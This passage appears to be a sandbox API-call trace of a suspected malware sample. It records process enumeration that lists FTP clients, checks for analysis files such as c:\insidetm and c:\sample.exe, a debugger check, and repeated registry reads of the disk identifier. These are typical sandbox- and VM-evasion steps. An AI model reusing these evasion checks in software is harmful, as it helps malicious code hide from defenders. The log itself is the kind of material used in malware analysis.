cntUsage=0x0, th32ProcessID=0x3ac, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.574] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.575] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.575] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.576] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.576] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.577] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.577] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.578] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.578] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.579] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.579] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.580] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.582] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.583] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: 
lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.584] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.584] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.585] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.586] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0099.586] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.587] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.587] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.588] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.588] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.589] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.589] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.590] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.590] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.591] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.591] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.592] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.592] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.593] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.593] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.594] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.595] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.595] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.867] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.867] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.867] GlobalUnlock (hMem=0x45000c) returned 0 [0099.867] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.867] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.867] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.867] GlobalUnlock (hMem=0x45000c) returned 0 [0099.867] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.867] GlobalUnlock (hMem=0x450004) returned 0 [0099.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0099.872] Process32First (in: hSnapshot=0x180, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.370] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.370] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.370] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.371] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.371] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.371] GlobalUnlock 
(hMem=0x45000c) returned 0 [0100.371] GetFileAttributesA (lpFileName="c:\\insidetm" (normalized: "c:\\insidetm")) returned 0xffffffff [0100.371] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.371] GlobalUnlock (hMem=0x45000c) returned 0 [0100.371] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.371] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.371] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.371] GlobalUnlock (hMem=0x45000c) returned 0 [0100.371] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.371] GlobalUnlock (hMem=0x450004) returned 0 [0100.371] GetFileAttributesA (lpFileName="c:\\sample.exe" (normalized: "c:\\sample.exe")) returned 0xffffffff [0100.372] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0100.372] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.372] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.372] GlobalUnlock (hMem=0x450004) returned 0 [0100.372] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.372] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.372] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.372] GlobalUnlock (hMem=0x450004) returned 0 [0100.372] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.372] GlobalUnlock (hMem=0x45000c) returned 0 [0100.372] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0100.372] IsDebuggerPresent () returned 0 [0100.372] FreeLibrary (hLibModule=0x76d30000) returned 1 [0100.373] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.373] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) 
returned 0 [0100.373] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) returned 0 [0100.373] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.373] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.373] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.373] GlobalUnlock (hMem=0x450004) returned 0 [0100.373] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.373] GlobalUnlock (hMem=0x45000c) returned 0 [0100.373] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.374] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.374] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.374] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.374] GlobalUnlock (hMem=0x45000c) returned 0 [0100.374] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.374] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.374] GlobalUnlock (hMem=0x45000c) returned 0 [0100.374] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.374] GlobalUnlock (hMem=0x450004) returned 0 [0100.374] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.374] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.374] GlobalUnlock (hMem=0x450004) returned 0 [0100.374] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.375] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.375] 
GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.375] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] RegCloseKey (hKey=0x190) returned 0x0 [0100.375] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.375] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.375] GlobalUnlock (hMem=0x45000c) returned 0 [0100.375] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.375] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.375] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.375] GlobalUnlock (hMem=0x450004) returned 0 [0100.376] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.376] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.376] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.376] GlobalUnlock (hMem=0x450004) returned 0 [0100.376] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.376] GlobalUnlock (hMem=0x45000c) returned 0 [0100.376] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.376] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.376] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.376] GlobalLock (hMem=0x45000c) returned 
0x588f38 [0100.376] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.376] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.377] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.377] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.377] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.377] GlobalUnlock (hMem=0x45000c) returned 0 [0100.377] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.377] GlobalUnlock (hMem=0x450004) returned 0 [0100.377] RegCloseKey (hKey=0x190) returned 0x0 [0100.378] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.378] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] 
GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.378] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.378] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.378] GlobalUnlock (hMem=0x45000c) returned 0 [0100.378] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.378] GlobalUnlock (hMem=0x450004) returned 0 [0100.378] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.378] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.379] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.379] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.379] GlobalHandle 
(pMem=0x588f38) returned 0x45000c [0100.379] GlobalUnlock (hMem=0x45000c) returned 0 [0100.379] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.379] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.379] GlobalUnlock (hMem=0x450004) returned 0 [0100.379] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalLock (hMem=0x450004) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] RegCloseKey (hKey=0x190) returned 0x0 [0100.380] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.380] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.380] GlobalUnlock (hMem=0x450004) returned 0 [0100.380] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.380] GlobalUnlock (hMem=0x45000c) returned 0 [0100.380] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.380] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.381] GlobalUnlock (hMem=0x45000c) returned 0 [0100.381] GlobalLock (hMem=0x45000c) returned 0x588f38 [0100.381] GlobalLock (hMem=0x450004) returned 
0x56f100 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x45000c [0100.381] GlobalUnlock (hMem=0x45000c) returned 0 [0100.381] GlobalHandle (pMem=0x56f100) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fdf8 | out: phkResult=0x18fdf8*=0x190) returned 0x0 [0100.381] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x0, lpcbData=0x18fdf0*=0x0 | out: lpType=0x18fdf4*=0x1, lpData=0x0, lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.381] RegQueryValueExA (in: hKey=0x190, lpValueName="0", lpReserved=0x0, lpType=0x18fdf4, lpData=0x1e93418, lpcbData=0x18fdf0*=0x4c | out: lpType=0x18fdf4*=0x1, lpData="IDE\\DiskHD502HI_________________________________OF90____\\5&1981bee2&0&0.0.0", lpcbData=0x18fdf0*=0x4c) returned 0x0 [0100.381] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] GlobalLock (hMem=0x450004) returned 0x588f38 [0100.381] GlobalLock (hMem=0x45000c) returned 0x56f100 [0100.381] GlobalHandle (pMem=0x588f38) returned 0x450004 [0100.381] GlobalUnlock (hMem=0x450004) returned 0 [0100.381] GlobalHandle (pMem=0x56f100) returned 0x45000c [0100.382] GlobalUnlock 